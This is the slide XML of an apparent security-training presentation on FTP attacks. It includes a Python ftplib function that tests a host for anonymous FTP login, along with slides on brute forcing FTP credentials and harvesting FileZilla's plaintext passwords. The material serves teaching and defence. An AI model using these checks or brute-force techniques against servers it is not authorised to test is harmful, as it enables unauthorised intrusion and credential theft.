              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>By using this function, it is possible to check if a server offers anonymous logins and take the necessary measures to secure it. It's also important to monitor logs and keep the system updated to avoid vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr>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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="172921" y="8268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FTP anonymous LogIN</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="529" name="Google Shape;529;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264550" y="2140975"/>
            <a:ext cx="11386200" cy="4599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400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>import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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ftplib</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</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anon_login</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>hostname</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ftp</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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ftplib</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E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>hostname</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try</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ftp</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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>login</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98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'anonymous'</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'me@your.com'</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print</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>f</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\n</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[*] </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>hostname</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D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> FTP Anonymous Logon Succeeded.'</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return</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D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="D19A66"/>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except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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Exception</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as</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e</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print</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>f</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56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>\n</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[-] </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>hostname</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D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> FTP Anonymous Logon Failed.'</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print</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'[-] Exception: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</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return</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D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>False</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="D19A66"/>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finally</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ftp</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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>quit</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400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if</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__name__</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"__main__"</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host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'192.168.95.179'</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anon_login</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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>host</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1e9a65c21fa_21_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164746" y="8023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Using Ftplib to Brute Force FTP User Credentials Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="Google Shape;535;g1e9a65c21fa_21_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680326" y="2336875"/>
            <a:ext cx="11087100" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>While anonymous access grants one way to enter into systems, attackers also have been quite successful with using stolen credentials to gain access to legitimate FTP servers. </a:t>
            </a:r>
            <a:endParaRPr sz="2020">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>FTP Client programs, such as FileZilla, often store passwords in plaintext configuration files (Huang, 2011). Storing passwords in cleartext in a default location allows custom malware to quickly steal credentials. </a:t>
            </a:r>
            <a:endParaRPr sz="2020">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Security experts have found FTP stealing credentials as recent malware. Furthermore, HD Moore even included the get_filezilla_creds.rb script in a recent Metasploit</a:t>
            </a:r>
            <a:endParaRPr sz="2020">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Imagine a text file of a username/password combination we wanted to brute force through.</a:t>
            </a:r>
            <a:endParaRPr sz="2020">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1e9a65c21fa_21_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164746" y="8023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Using Ftplib to Brute Force FTP User Credentials Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="Google Shape;541;g1e9a65c21fa_21_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2502430"/>
            <a:ext cx="11779015" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1946"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-326767" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1546"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This statement describes another way attackers can gain access to legitimate FTP servers, by using stolen credentials. Attackers can steal credentials by various means such as malware, phishing, or social engineering. Once they have the credentials, they can use them to connect to the server and potentially upload or download files, including malicious files.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-326767" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1546"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>FTP clients, such as FileZilla, often store passwords in plaintext configuration files, which can be easily read by attackers. This is a security vulnerability because it allows attackers to quickly steal credentials if they have access to the configuration files. Additionally, storing passwords in plaintext in a default location can also be exploited by custom malware that specifically target those files.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="Google Shape;542;g1e9a65c21fa_21_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571552" y="2141636"/>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1e9a65c21fa_21_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164746" y="8023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Using Ftplib to Brute Force FTP User Credentials Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="Google Shape;548;g1e9a65c21fa_21_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2381908"/>
            <a:ext cx="11329427" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Security experts have found that stealing FTP credentials is a common tactic used by malware. For example, HD Moore has included the get_filezilla_creds.rb script in a recent version of Metasploit, which is a penetration testing tool that can be used to steal FTP credentials. This script can be used to extract credentials from the configuration files of FTP clients like FileZilla.</a:t>
            </a:r>
            <a:endParaRPr sz="2020">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The statement also mentions the possibility of using a text file of username/password combinations to perform a brute-force attack on the server. A brute-force attack is a method of guessing a password by trying every possible combination of characters until the correct one is found. This method can be very time-consuming and may not be successful, but it can be automated by using a script.</a:t>
            </a:r>
            <a:endParaRPr sz="2020">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24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180050" y="785650"/>
            <a:ext cx="9951600" cy="1071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Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
